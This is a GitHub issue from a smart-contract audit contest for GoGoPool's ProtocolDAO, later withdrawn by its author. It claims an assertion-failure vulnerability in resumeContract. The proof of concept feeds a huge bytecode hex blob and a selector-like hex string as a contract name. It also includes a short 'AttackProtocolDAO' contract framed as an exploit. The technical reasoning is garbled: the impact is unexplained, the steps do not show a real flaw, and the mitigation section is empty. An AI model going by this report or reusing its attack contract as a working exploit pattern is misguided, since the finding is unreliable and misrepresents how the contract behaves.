search

code-423n4 / 2022-12-gogopool-findings

1 stars 0 forks source link

SWC-110 A user-provided assertion failed. Invalid input is successfully being parsed. ProtocolDAO #295

Closed code423n4 closed 1 year ago

code423n4 commented 1 year ago

Lines of code

https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/ProtocolDAO.sol#L73-L75

Vulnerability details

[M-02]

Impact

SWC-110 A user-provided assertion failed with the message 'Panic(0x41)'. The first transactin failed. But, the second transaction was a success. Invalid input is successfully being parsed.

Proof of Concept

Step 1 Transaction 1 (contract creation) In remix ide Deploy the victim ProtocolDAO.sol Contract with this address: 0xaffeaffeaffeaffeaffeaffeaffeaffeaffeaffe (Creator) In remix ide Call the victim function with this contract name: ProtocolDAO.resumeContract("0x60806040523480156200001157600080fd5b5060405162002b8d38038062002b8d83398181016040528101906200003791906200011a565b8080600060016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505060016000806101000a81548160ff021916908360ff160217905550506200014c565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000620000ce82620000a1565b9050919050565b6000620000e282620000c1565b9050919050565b620000f481620000d5565b81146200010057600080fd5b50565b6000815190506200011481620000e9565b92915050565b6000602082840312156200013357620001326200009c565b5b6000620001438482850162000103565b91505092915050565b612a31806200015c6000396000f3fe608060405234801561001057600080fd5b506004361061018e5760003560e01c8063672cb02e116100de578063b57cc6e311610097578063ea2a184711610071578063ea2a184714610417578063ee96d77414610435578063f8cafbed14610453578063fac2c621146104835761018e565b8063b57cc6e3146103bf578063b7b1ea34146103dd578063da23c0d9146103fb5761018e565b8063672cb02e1461032157806370b2ecc91461033d578063780ba7861461035b5780638129fc1c1461037957806382b33dab14610383578063a88a6a38146103a15761018e565b8063312fb2be1161014b57806354fd4d501161012557806354fd4d50146102ab5780635ad174eb146102c95780635b706f76146102e75780635f057008146103035761018e565b8063312fb2be14610257578063332ca53f1461027357806333ad94da1461028f5761018e565b80630ef7bfe414610193578063156128cc146101b15780632a90c63a146101e15780632ef959be146101ff5780632ffc52ee1461021d578063305f55221461023b575b600080fd5b61019b61049f565b6040516101a89190611dbb565b60405180910390f35b6101cb60048036038101906101c69190611f30565b6104cf565b6040516101d89190611f94565b60405180910390f35b6101e9610507565b6040516101f69190611dbb565b60405180910390f35b610207610537565b6040516102149190611dbb565b60405180910390f35b610225610567565b6040516102329190611dbb565b60405180910390f35b61025560048036038101906102509190611fdb565b610597565b005b610271600480360381019061026c9190611f30565b610726565b005b61028d60048036038101906102889190612066565b610826565b005b6102a960048036038101906102a49190611fdb565b610933565b005b6102b3610a2c565b6040516102c091906120f1565b60405180910390f35b6102d1610a3d565b6040516102de9190611dbb565b60405180910390f35b61030160048036038101906102fc919061210c565b610a6d565b005b61030b610bda565b6040516103189190611dbb565b60405180910390f35b61033b60048036038101906103369190611f30565b610c0a565b005b610345610d0a565b6040516103529190611dbb565b60405180910390f35b610363610d3a565b6040516103709190611dbb565b60405180910390f35b610381610d6a565b005b61038b6111ff565b6040516103989190611dbb565b60405180910390f35b6103a961122f565b6040516103b69190611dbb565b60405180910390f35b6103c761125f565b6040516103d49190611dbb565b60405180910390f35b6103e561128f565b6040516103f29190611dbb565b60405180910390f35b61041560048036038101906104109190612168565b6112bf565b005b61041f611449565b60405161042c9190611dbb565b60405180910390f35b61043d611479565b60405161044a9190611dbb565b60405180910390f35b61046d60048036038101906104689190611f30565b6114cc565b60405161047a9190611dbb565b60405180910390f35b61049d600480360381019061049891906121c4565b611504565b005b60006104ca7f0dc867b271887c7eec3f5402333408fc3011cdef36536b1a408d1c1f56f542cb611697565b905090565b6000610500826040516020016104e591906122ae565b6040516020818303038152906040528051906020012061173b565b9050919050565b60006105327f7b35b60bd916e534855f85c33202afb264eb58a7ef781e4445a9386a5fbae403611697565b905090565b60006105627fba21c1cce634aeed3329236389f837b3fd8b85e1f3fb38e3f1bb90c71370969d611697565b905090565b60006105927f5ef3341cc2345d159d7a9d36448810b18db2982a355f0fc8ce3f89293ca24930611697565b905090565b600060016105ca336040516020016105af9190612364565b60405160208183030381529060405280519060200120611697565b6105d491906123c3565b90506000610607826040516020016105ec91906124bf565b604051602081830303815290604052805190602001206117df565b905060008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614158015610672575061067183604051602001610656919061253c565b6040516020818303038152906040528051906020012061173b565b5b905060001515811515036106b2576040517f834baa5d00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b83670de0b6b3a76400008111156106f5576040517f86f9bd0900000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b61071f7f044038e4c14c368a776f2e68e7e1309212406a8a8a21d869cebd3f334236e34f86611883565b5050505050565b6040518060400160405280600881526020017f4f637974696375730000000000000000000000000000000000000000000000008152503361078c8260405160200161077191906125b9565b604051602081830303815290604052805190602001206117df565b73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16146107f0576040517f3ddd2bb600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6108218360405160200161080491906122ae565b604051602081830303815290604052805190602001206000611916565b505050565b600060019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663a75b87d26040518163ffffffff1660e01b8152600401602060405180830381865afa158015610893573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906108b791906125f0565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461091b576040517f0da3c81800000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b61092583836112bf565b61092e81611504565b505050565b6040518060400160405280600b81526020017f52657761726473506f6f6c000000000000000000000000000000000000000000815250336109998260405160200161097e91906125b9565b604051602081830303815290604052805190602001206117df565b73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16146109fd576040517f3ddd2bb600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b610a277f5ef3341cc2345d159d7a9d36448810b18db2982a355f0fc8ce3f89293ca2493084611883565b505050565b60008054906101000a900460ff1681565b6000610a687fe9c3e5798c6fb1f1728bab98d1c9abeede6f973ad6e8e875a1111762d5f77fc8611697565b905090565b600060019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663a75b87d26040518163ffffffff1660e01b8152600401602060405180830381865afa158015610ada573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610afe91906125f0565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610b62576040517f0da3c81800000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b80670de0b6b3a7640000811115610ba5576040517f86f9bd0900000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b610bd583604051602001610bb99190612669565b6040516020818303038152906040528051906020012083611883565b505050565b6000610c057f08345aa342b4dfe3b2e6599d5fd542b0dceeed01f13af576ebe8d826ce9e4aff611697565b905090565b6040518060400160405280600881526020017f4f6379746963757300000000000000000000000000000000000000000000000081525033610c7082604051602001610c5591906125b9565b604051602081830303815290604052805190602001206117df565b73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614610cd4576040517f3ddd2bb600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b610d0583604051602001610ce891906122ae565b604051602081830303815290604052805190602001206001611916565b505050565b6000610d357f36abfca3397228bb7045d980d82b75762d05263fcc19a5bc66377d6d6b07bbe7611697565b905090565b6000610d657f961b8a5046753060bfd1842ea297c2da690c100c70ba04776b3b30f388918400611697565b905090565b600060019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663a75b87d26040518163ffffffff1660e01b8152600401602060405180830381865afa158015610dd7573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610dfb91906125f0565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610e5f576040517f0da3c81800000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b610e887f78f2ecffe9bb4692db9798f12147e9ee8cfb749c8e687564ded6c82c2effad8c61173b565b6111fd57610eb77f78f2ecffe9bb4692db9798f12147e9ee8cfb749c8e687564ded6c82c2effad8c6001611916565b610ee47f36abfca3397228bb7045d980d82b75762d05263fcc19a5bc66377d6d6b07bbe762127500611883565b610f117fa79ae78ddc74ee02a9783dee66b773b0bd867d7ec505bf0884223ab26599b31b6224ea00611883565b610f467f5ef3341cc2345d159d7a9d36448810b18db2982a355f0fc8ce3f89293ca249306a0ee3a5f48a68b552000000611883565b610f787ffabbc1d17e2a2094fe757da228b7265a89adc29f281fb775e81bff94a3e8892d6702c68af0bb140000611883565b610faa7fb398169ab69ae04e0901655387a411fcceea112138bd06777cfe010d591f5be16709b6e64a8ec60000611883565b610fdc7f67fc706363d162ae6776f19f390e869b62a078865d221d1ad8cc6130cdaaa18067016345785d8a0000611883565b6110097f13a3ac49dc96021c96b7aad3b32ec1ee330a14104d073730acf9f36d8831c36b62015180611883565b61103b7fd3186c81e428ab275d82b574c58975f2fd5add6555288c34ffa67511f269375d670de130489916479c611883565b61106d7fe9c3e5798c6fb1f1728bab98d1c9abeede6f973ad6e8e875a1111762d5f77fc867016345785d8a0000611883565b6110a07f2e2631a3115d87a754e59cbd024b9317a2c343bdb3fd1310d6291d2f2bb71b3c686c6b935b8bbd400000611883565b6110d27fce0f77cf5fa8354e652a3184449d509e226fc06bbf19cfc9fb20c8cf4d4ade4d670214e8348c4f0000611883565b6111067f08345aa342b4dfe3b2e6599d5fd542b0dceeed01f13af576ebe8d826ce9e4aff69021e19e0c9bab2400000611883565b6111397f0dc867b271887c7eec3f5402333408fc3011cdef36536b1a408d1c1f56f542cb683635c9adc5dea00000611883565b61116b7f044038e4c14c368a776f2e68e7e1309212406a8a8a21d869cebd3f334236e34f67016345785d8a0000611883565b6111987fba21c1cce634aeed3329236389f837b3fd8b85e1f3fb38e3f1bb90c71370969d62069780611883565b6111ca7f961b8a5046753060bfd1842ea297c2da690c100c70ba04776b3b30f3889184006714d1120d7b160000611883565b6111fc7f7b35b60bd916e534855f85c33202afb264eb58a7ef781e4445a9386a5fbae40367016345785d8a0000611883565b5b565b600061122a7fce0f77cf5fa8354e652a3184449d509e226fc06bbf19cfc9fb20c8cf4d4ade4d611697565b905090565b600061125a7f2e2631a3115d87a754e59cbd024b9317a2c343bdb3fd1310d6291d2f2bb71b3c611697565b905090565b600061128a7f044038e4c14c368a776f2e68e7e1309212406a8a8a21d869cebd3f334236e34f611697565b905090565b60006112ba7f13a3ac49dc96021c96b7aad3b32ec1ee330a14104d073730acf9f36d8831c36b611697565b905090565b600060019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663a75b87d26040518163ffffffff1660e01b8152600401602060405180830381865afa15801561132c573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061135091906125f0565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16146113b4576040517f0da3c81800000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6113e5826040516020016113c891906126d7565b604051602081830303815290604052805190602001206001611916565b611415816040516020016113f991906125b9565b60405160208183030381529060405280519060200120836119a9565b611445826040516020016114299190612749565b6040516020818303038152906040528051906020012082611a3c565b5050565b60006114747fa79ae78ddc74ee02a9783dee66b773b0bd867d7ec505bf0884223ab26599b31b611697565b905090565b6000806114a57fd3186c81e428ab275d82b574c58975f2fd5add6555288c34ffa67511f269375d611697565b9050670de0b6b3a764000081106114bc57806114c6565b670de0b6b3a76400005b91505090565b60006114fd826040516020016114e29190612669565b60405160208183030381529060405280519060200120611697565b9050919050565b600060019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663a75b87d26040518163ffffffff1660e01b8152600401602060405180830381865afa158015611571573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061159591906125f0565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16146115f9576040517f0da3c81800000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b600061160482611acf565b90506116358260405160200161161a91906126d7565b60405160208183030381529060405280519060200120611b48565b6116648160405160200161164991906125b9565b60405160208183030381529060405280519060200120611bd8565b611693826040516020016116789190612749565b60405160208183030381529060405280519060200120611c68565b5050565b60008060019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663bd02d0f5836040518263ffffffff1660e01b81526004016116f39190612788565b602060405180830381865afa158015611710573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061173491906127b8565b9050919050565b60008060019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16637ae1cfca836040518263ffffffff1660e01b81526004016117979190612788565b602060405180830381865afa1580156117b4573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906117d89190612811565b9050919050565b60008060019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166321f8a721836040518263ffffffff1660e01b815260040161183b9190612788565b602060405180830381865afa158015611858573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061187c91906125f0565b9050919050565b600060019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663e2a4853a83836040518363ffffffff1660e01b81526004016118e092919061283e565b600060405180830381600087803b1580156118fa57600080fd5b505af115801561190e573d6000803e3d6000fd5b505050505050565b600060019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663abfdcced83836040518363ffffffff1660e01b8152600401611973929190612867565b600060405180830381600087803b15801561198d57600080fd5b505af11580156119a1573d6000803e3d6000fd5b505050505050565b600060019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ca446dd983836040518363ffffffff1660e01b8152600401611a0692919061289f565b600060405180830381600087803b158015611a2057600080fd5b505af1158015611a34573d6000803e3d6000fd5b505050505050565b600060019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16636e89955083836040518363ffffffff1660e01b8152600401611a99929190612912565b600060405180830381600087803b158015611ab357600080fd5b505af1158015611ac7573d6000803e3d6000fd5b505050505050565b60606000611b0283604051602001611ae79190612749565b60405160208183030381529060405280519060200120611cf8565b90506000815103611b3f576040517fed59262400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b80915050919050565b600060019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16632c62ff2d826040518263ffffffff1660e01b8152600401611ba39190612788565b600060405180830381600087803b158015611bbd57600080fd5b505af1158015611bd1573d6000803e3d6000fd5b5050505050565b600060019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16630e14a376826040518263ffffffff1660e01b8152600401611c339190612788565b600060405180830381600087803b158015611c4d57600080fd5b505af1158015611c61573d6000803e3d6000fd5b5050505050565b600060019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f6bb3cc4826040518263ffffffff1660e01b8152600401611cc39190612788565b600060405180830381600087803b158015611cdd57600080fd5b505af1158015611cf1573d6000803e3d6000fd5b5050505050565b6060600060019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663986e791a836040518263ffffffff1660e01b8152600401611d559190612788565b600060405180830381865afa158015611d72573d6000803e3d6000fd5b505050506040513d6000823e3d601f19601f82011682018060405250810190611d9b91906129b2565b9050919050565b6000819050919050565b611db581611da2565b82525050565b6000602082019050611dd06000830184611dac565b92915050565b6000604051905090565b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b611e3d82611df4565b810181811067ffffffffffffffff82111715611e5c57611e5b611e05565b5b80604052505050565b6000611e6f611dd6565b9050611e7b8282611e34565b919050565b600067ffffffffffffffff821115611e9b57611e9a611e05565b5b611ea482611df4565b9050602081019050919050565b82818337600083830152505050565b6000611ed3611ece84611e80565b611e65565b905082815260208101848484011115611eef57611eee611def565b5b611efa848285611eb1565b509392505050565b600082601f830112611f1757611f16611dea565b5b8135611f27848260208601611ec0565b91505092915050565b600060208284031215611f4657611f45611de0565b5b600082013567ffffffffffffffff811115611f6457611f63611de5565b5b611f7084828501611f02565b91505092915050565b60008115159050919050565b611f8e81611f79565b82525050565b6000602082019050611fa96000830184611f85565b92915050565b611fb881611da2565b8114611fc357600080fd5b50565b600081359050611fd581611faf565b92915050565b600060208284031215611ff157611ff0611de0565b5b6000611fff84828501611fc6565b91505092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061203382612008565b9050919050565b61204381612028565b811461204e57600080fd5b50565b6000813590506120608161203a565b92915050565b60008060006060848603121561207f5761207e611de0565b5b600061208d86828701612051565b935050602084013567ffffffffffffffff8111156120ae576120ad611de5565b5b6120ba86828701611f02565b92505060406120cb86828701612051565b9150509250925092565b600060ff82169050919050565b6120eb816120d5565b82525050565b600060208201905061210660008301846120e2565b92915050565b6000806040838503121561212357612122611de0565b5b600083013567ffffffffffffffff81111561214157612140611de5565b5b61214d85828601611f02565b925050602061215e85828601611fc6565b9150509250929050565b6000806040838503121561217f5761217e611de0565b5b600061218d85828601612051565b925050602083013567ffffffffffffffff8111156121ae576121ad611de5565b5b6121ba85828601611f02565b9150509250929050565b6000602082840312156121da576121d9611de0565b5b60006121e884828501612051565b91505092915050565b600081905092915050565b7f636f6e74726163742e7061757365640000000000000000000000000000000000600082015250565b6000612232600f836121f1565b915061223d826121fc565b600f82019050919050565b600081519050919050565b60005b83811015612271578082015181840152602081019050612256565b60008484015250505050565b600061228882612248565b61229281856121f1565b93506122a2818560208601612253565b80840191505092915050565b60006122b982612225565b91506122c5828461227d565b915081905092915050565b7f6d756c74697369672e696e646578000000000000000000000000000000000000600082015250565b6000612306600e836121f1565b9150612311826122d0565b600e82019050919050565b60008160601b9050919050565b60006123348261231c565b9050919050565b600061234682612329565b9050919050565b61235e61235982612028565b61233b565b82525050565b600061236f826122f9565b915061237b828461234d565b60148201915081905092915050565b6000819050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006123ce8261238a565b91506123d98361238a565b9250828203905081811260008412168282136000851215161715612400576123ff612394565b5b92915050565b7f6d756c74697369672e6974656d00000000000000000000000000000000000000600082015250565b600061243c600d836121f1565b915061244782612406565b600d82019050919050565b6000819050919050565b61246d6124688261238a565b612452565b82525050565b7f2e61646472657373000000000000000000000000000000000000000000000000600082015250565b60006124a96008836121f1565b91506124b482612473565b600882019050919050565b60006124ca8261242f565b91506124d6828461245c565b6020820191506124e58261249c565b915081905092915050565b7f2e656e61626c6564000000000000000000000000000000000000000000000000600082015250565b60006125266008836121f1565b9150612531826124f0565b600882019050919050565b60006125478261242f565b9150612553828461245c565b60208201915061256282612519565b915081905092915050565b7f636f6e74726163742e6164647265737300000000000000000000000000000000600082015250565b60006125a36010836121f1565b91506125ae8261256d565b601082019050919050565b60006125c482612596565b91506125d0828461227d565b915081905092915050565b6000815190506125ea8161203a565b92915050565b60006020828403121561260657612605611de0565b5b6000612614848285016125db565b91505092915050565b7f50726f746f636f6c44414f2e436c61696d696e67436f6e74726163745063742e600082015250565b60006126536020836121f1565b915061265e8261261d565b602082019050919050565b600061267482612646565b9150612680828461227d565b915081905092915050565b7f636f6e74726163742e6578697374730000000000000000000000000000000000600082015250565b60006126c1600f836121f1565b91506126cc8261268b565b600f82019050919050565b60006126e2826126b4565b91506126ee828461234d565b60148201915081905092915050565b7f636f6e74726163742e6e616d6500000000000000000000000000000000000000600082015250565b6000612733600d836121f1565b915061273e826126fd565b600d82019050919050565b600061275482612726565b9150612760828461234d565b60148201915081905092915050565b6000819050919050565b6127828161276f565b82525050565b600060208201905061279d6000830184612779565b92915050565b6000815190506127b281611faf565b92915050565b6000602082840312156127ce576127cd611de0565b5b60006127dc848285016127a3565b91505092915050565b6127ee81611f79565b81146127f957600080fd5b50565b60008151905061280b816127e5565b92915050565b60006020828403121561282757612826611de0565b5b6000612835848285016127fc565b91505092915050565b60006040820190506128536000830185612779565b6128606020830184611dac565b9392505050565b600060408201905061287c6000830185612779565b6128896020830184611f85565b9392505050565b61289981612028565b82525050565b60006040820190506128b46000830185612779565b6128c16020830184612890565b9392505050565b600082825260208201905092915050565b60006128e482612248565b6128ee81856128c8565b93506128fe818560208601612253565b61290781611df4565b840191505092915050565b60006040820190506129276000830185612779565b818103602083015261293981846128d9565b90509392505050565b600061295561295084611e80565b611e65565b90508281526020810184848401111561297157612970611def565b5b61297c848285612253565b509392505050565b600082601f83011261299957612998611dea565b5b81516129a9848260208601612942565b91505092915050565b6000602082840312156129c8576129c7611de0565b5b600082015167ffffffffffffffff8111156129e6576129e5611de5565b5b6129f284828501612984565b9150509291505056fea2646970667358221220e1d4c4b31c017b0bf7867e83fd9e9d932eb48b040ac2f5b69720f5c58d83178864736f6c6343000811003300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000") Results: Fail

Step 2 Transaction 2 In remix ide Deploy the AttackProtocolDAO.sol contract with this address: 0xaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa2 In remix ide Call the attack function with this contract name: protocoldao.resumeContract("0x312fb2be000000000000000000000000000000000000000000000000000000000000002800000000000000000000000000fb0000000000000000000000000000000000000000000000000000") Results: Success and value: address: 0xAaAaaAAAaAaaAaAaAaaAAaAaAAAAAaAAAaaAaAa2

Attack Code:

// SPDX-License-Identifier: GPL-3.0-only
pragma solidity >=0.6.0 <0.9.0;

import "https://github.com/code-423n4/2022-12-gogopool/blob/main/contracts/contract/Base.sol";
import {TokenGGP} from "https://github.com/code-423n4/2022-12-gogopool/blob/main/contracts/contract/tokens/TokenGGP.sol";
import {Storage} from "https://github.com/code-423n4/2022-12-gogopool/blob/main/contracts/contract/Storage.sol";

import "./ProtocolDAO.sol";

/// @title Settings for the Protocol
contract AttackProtocolDAO {
    ProtocolDAO public protocoldao;

    constructor(address _protocoldao) public  {
        protocoldao = ProtocolDAO(_protocoldao);
    }

    function resumeContract(string memory contractName)
        public

    {
        protocoldao.resumeContract(
            "0x312fb2be000000000000000000000000000000000000000000000000000000000000002800000000000000000000000000fb0000000000000000000000000000000000000000000000000000"
        );
    }
}

Tools Used

Remix IDE

Recommended Mitigation Steps

code423n4 commented 1 year ago

Withdrawn by debo